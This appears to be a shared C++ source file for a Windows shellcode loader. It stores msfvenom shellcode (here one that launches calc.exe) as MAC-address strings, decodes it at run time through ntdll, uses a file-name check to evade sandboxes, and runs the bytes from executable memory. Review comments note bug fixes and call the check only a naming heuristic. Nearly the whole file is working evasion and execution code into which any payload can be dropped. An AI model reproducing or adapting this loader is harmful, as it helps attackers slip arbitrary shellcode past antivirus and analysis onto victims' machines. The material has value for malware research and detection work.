@caueb
Created October 25, 2023 06:11
Simple sandbox-evasion check: the payload (msfvenom calc.exe shellcode) is only decoded and executed when the running executable's own path contains "itsnotmalware"; a copy renamed by an analysis sandbox exits before any shellcode is touched. The check is trivially satisfied by running the sample under its original name, so it is a naming heuristic, not a real environment detection.
// Payload encoding using HellShell (https://github.com/NUL0x4C/HellShell): the shellcode is stored as MAC-address strings and decoded at run time with ntdll!RtlEthernetStringToAddressA
// Compile with clang: clang++ -w -Oz -mwindows itsnotmalware.cpp -o itsnotmalware.exe
#include "Windows.h"
#include "stdio.h"
#include <iostream>
#include <string>
#include <regex>
#define _CRT_SECURE_NO_WARNINGS // NOTE(review): has no effect here -- it must be defined before the CRT headers (stdio.h above) are included; the -w flag in the compile line is what actually silences the warnings
#pragma warning(disable:4996) // MSVC-only pragma; clang ignores it
#define MAX_OP 89888996 // Iteration count of the busy-wait loop in checkSandbox()
using namespace std;
// msfvenom calc.exe -- x64 payload stored as 46 MAC-address-style strings ("XX-XX-XX-XX-XX-XX", 6 bytes each,
// 276 bytes total). MacDeobfuscation() turns them back into raw bytes with ntdll!RtlEthernetStringToAddressA.
// The final entries decode to the ASCII string "calc.exe\0" embedded in the shellcode.
// NOTE(review): a non-const char* array initialised from string literals is what the -w in the compile line
// silences; const char* would be the conforming declaration but MacDeobfuscation() takes CHAR*[].
char* MacArray[] = {
"FC-48-83-E4-F0-E8", "C0-00-00-00-41-51", "41-50-52-51-56-48", "31-D2-65-48-8B-52", "60-48-8B-52-18-48", "8B-52-20-48-8B-72",
"50-48-0F-B7-4A-4A", "4D-31-C9-48-31-C0", "AC-3C-61-7C-02-2C", "20-41-C1-C9-0D-41", "01-C1-E2-ED-52-41", "51-48-8B-52-20-8B",
"42-3C-48-01-D0-8B", "80-88-00-00-00-48", "85-C0-74-67-48-01", "D0-50-8B-48-18-44", "8B-40-20-49-01-D0", "E3-56-48-FF-C9-41",
"8B-34-88-48-01-D6", "4D-31-C9-48-31-C0", "AC-41-C1-C9-0D-41", "01-C1-38-E0-75-F1", "4C-03-4C-24-08-45", "39-D1-75-D8-58-44",
"8B-40-24-49-01-D0", "66-41-8B-0C-48-44", "8B-40-1C-49-01-D0", "41-8B-04-88-48-01", "D0-41-58-41-58-5E", "59-5A-41-58-41-59",
"41-5A-48-83-EC-20", "41-52-FF-E0-58-41", "59-5A-48-8B-12-E9", "57-FF-FF-FF-5D-48", "BA-01-00-00-00-00", "00-00-00-48-8D-8D",
"01-01-00-00-41-BA", "31-8B-6F-87-FF-D5", "BB-F0-B5-A2-56-41", "BA-A6-95-BD-9D-FF", "D5-48-83-C4-28-3C", "06-7C-0A-80-FB-E0",
"75-05-BB-47-13-72", "6F-6A-00-59-41-89", "DA-FF-D5-63-61-6C", "63-2E-65-78-65-00"
};
#define NumberOfElements 46
// Signature of ntdll!RtlEthernetStringToAddressA, which is not imported but resolved at run time with
// GetProcAddress in MacDeobfuscation().
//   S          -- input string in MAC notation "XX-XX-XX-XX-XX-XX"
//   Terminator -- receives a pointer to the first character not consumed by the parser
//   Addr       -- receives the 6 decoded bytes (the caller advances its output pointer by 6 per call)
using fnRtlEthernetStringToAddressA = NTSTATUS(NTAPI*)(PCSTR S, PCSTR* Terminator, PVOID Addr);
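// Author's anti-sandbox heuristic. Returns TRUE only when the running executable's full path contains
// "itsnotmalware" (directory components count too, as with the original regex); main() refuses to decode
// the payload otherwise. The apparent intent is that an analysis sandbox which renames the sample will not
// run it -- an analyst who keeps the original file name passes the check trivially.
// Returns FALSE when the name does not match or when the module path cannot be retrieved.
// Changes from the original: the path buffer is zero-initialised and the GetModuleFileNameA return value is
// checked, so a failed lookup no longer matches against uninitialised stack memory; the ANSI variant is named
// explicitly because the buffer is char[] (plain GetModuleFileName maps to the wide version under UNICODE);
// the "(.*)(itsnotmalware)(.*)" regex is replaced by the equivalent substring search.
BOOL checkSandbox() {
    // Busy-wait stall kept from the original. It has no observable side effect, so an optimising build
    // (the header line says -Oz) may fold it to `cpt = MAX_OP`; do not rely on it consuming real time.
    int cpt = 0;
    for (int i = 0; i < MAX_OP; i++) {
        cpt++;
    }
    if (cpt != MAX_OP) {
        return FALSE;
    }

    char path[MAX_PATH] = {0};
    DWORD len = GetModuleFileNameA(NULL, path, MAX_PATH);
    // 0 means the call failed; a return equal to the buffer size means the path was truncated.
    // Both are treated as "cannot verify" rather than matched against a partial/garbage buffer.
    if (len == 0 || len >= MAX_PATH) {
        return FALSE;
    }

    std::string modulePath(path, len);
    return (modulePath.find("itsnotmalware") != std::string::npos) ? TRUE : FALSE;
}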
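// Decodes the MAC-notation string array back into one contiguous byte buffer.
// Each entry "XX-XX-XX-XX-XX-XX" yields 6 bytes, so the output is NmbrOfElements * 6 bytes, allocated from
// the process heap. The caller owns the buffer and releases it with HeapFree(GetProcessHeap(), 0, *ppDAddress).
//   MacArray        -- array of NmbrOfElements MAC strings
//   NmbrOfElements  -- number of entries in MacArray
//   ppDAddress      -- receives the decoded buffer (only written on success)
//   pDSize          -- receives the buffer size in bytes (only written on success)
// Returns TRUE on success. On failure a diagnostic is printed to stdout and FALSE is returned with the
// out-parameters untouched. Unlike the original, a decode failure frees the partially filled buffer
// instead of leaking it, and an empty input is rejected instead of producing a zero-length buffer.
// The decoder is ntdll!RtlEthernetStringToAddressA, looked up at run time rather than imported.
BOOL MacDeobfuscation(IN CHAR* MacArray[], IN SIZE_T NmbrOfElements, OUT PBYTE* ppDAddress, OUT SIZE_T* pDSize) {
    fnRtlEthernetStringToAddressA pRtlEthernetStringToAddressA =
        (fnRtlEthernetStringToAddressA)GetProcAddress(GetModuleHandle(TEXT("NTDLL")), "RtlEthernetStringToAddressA");
    if (pRtlEthernetStringToAddressA == NULL) {
        printf("[!] GetProcAddress Failed With Error : %lu \n", GetLastError());
        return FALSE;
    }
    if (MacArray == NULL || NmbrOfElements == 0 || ppDAddress == NULL || pDSize == NULL) {
        printf("[!] MacDeobfuscation called with empty input\n");
        return FALSE;
    }

    const SIZE_T sBuffSize = NmbrOfElements * 6; // 6 bytes per MAC string
    PBYTE pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), 0, sBuffSize);
    if (pBuffer == NULL) {
        printf("[!] HeapAlloc Failed With Error : %lu \n", GetLastError());
        return FALSE;
    }

    PBYTE TmpBuffer = pBuffer;
    for (SIZE_T i = 0; i < NmbrOfElements; i++) {
        PCSTR Terminator = NULL;
        NTSTATUS STATUS = pRtlEthernetStringToAddressA(MacArray[i], &Terminator, TmpBuffer);
        if (STATUS != 0) { // STATUS_SUCCESS is 0
            printf("[!] RtlEthernetStringToAddressA Failed At [%s] With Error 0x%08lX\n", MacArray[i], (unsigned long)STATUS);
            HeapFree(GetProcessHeap(), 0, pBuffer); // original leaked the buffer on this path
            return FALSE;
        }
        TmpBuffer += 6;
    }

    *ppDAddress = pBuffer;
    *pDSize = sBuffSize;
    return TRUE;
}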
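// Entry point: runs the naming check, decodes the embedded shellcode, copies it into a fresh
// PAGE_EXECUTE_READWRITE allocation and calls into it on the current thread.
// Returns -1 on any failure before execution. Whether control ever returns from the shellcode depends on
// the payload's own exit behaviour, which is not visible here, so the trailing `return 0` is best-effort and
// the RWX region is deliberately not freed.
// Changes from the original: VirtualAlloc's result is checked before memcpy (a NULL return would have been
// dereferenced), and the heap copy of the decoded payload is released once it has been copied, since it is
// not referenced after that point.
int main() {
    PBYTE pDeobfuscatedPayload = NULL;
    SIZE_T sDeobfuscatedSize = 0;

    if (!checkSandbox()) {
        printf("[-] Name of the program running is different...exit...\n");
        return -1;
    }

    // Decode the MAC-string-encoded shellcode into a heap buffer.
    if (!MacDeobfuscation(MacArray, NumberOfElements, &pDeobfuscatedPayload, &sDeobfuscatedSize)) {
        printf("[-] Decoding error!\n");
        return -1;
    }

    // Executable region for the decoded MSF shellcode (flags unchanged from the original).
    void* exec = VirtualAlloc(NULL, sDeobfuscatedSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        printf("[-] VirtualAlloc Failed With Error : %lu\n", GetLastError());
        HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload);
        return -1;
    }

    memcpy(exec, pDeobfuscatedPayload, sDeobfuscatedSize);
    // The heap copy is no longer needed once the bytes live in the executable region.
    HeapFree(GetProcessHeap(), 0, pDeobfuscatedPayload);
    pDeobfuscatedPayload = NULL;

    // Transfer control to the shellcode in the current thread.
    ((void(*)())exec)();
    return 0;
}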